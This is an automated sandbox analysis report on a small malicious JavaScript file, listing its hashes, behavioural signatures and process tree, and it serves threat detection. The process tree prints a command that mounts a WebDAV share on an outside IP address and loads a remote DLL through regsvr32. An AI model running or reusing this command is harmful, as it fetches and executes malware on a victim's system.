Analysis
-
max time kernel
93s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
1f812a86dce1ebc1ff29369dfc2ddd55a52bad36288024d17863065bf6cb5ead.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
1f812a86dce1ebc1ff29369dfc2ddd55a52bad36288024d17863065bf6cb5ead.js
Resource
win10v2004-20240709-en
General
-
Target
1f812a86dce1ebc1ff29369dfc2ddd55a52bad36288024d17863065bf6cb5ead.js
-
Size
3KB
-
MD5
aaba1888e3aed79b76370f458858cd7c
-
SHA1
72d2d0a411fde40080ecdd09dbe594eb2555d191
-
SHA256
1f812a86dce1ebc1ff29369dfc2ddd55a52bad36288024d17863065bf6cb5ead
-
SHA512
42abe150d368c4e915afe9b74a3c1e59004fc72b5a5729b10a0219a23c593d4f0c5dcda9216c7334a3e5e69e8fde1bfff9ff9669df735e0ec219f19caa02fb84
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2408 wrote to memory of 3144 2408 wscript.exe 84 PID 2408 wrote to memory of 3144 2408 wscript.exe 84 PID 3144 wrote to memory of 1272 3144 cmd.exe 86 PID 3144 wrote to memory of 1272 3144 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1f812a86dce1ebc1ff29369dfc2ddd55a52bad36288024d17863065bf6cb5ead.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\38041904116266.dll2⤵
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:1272
-
-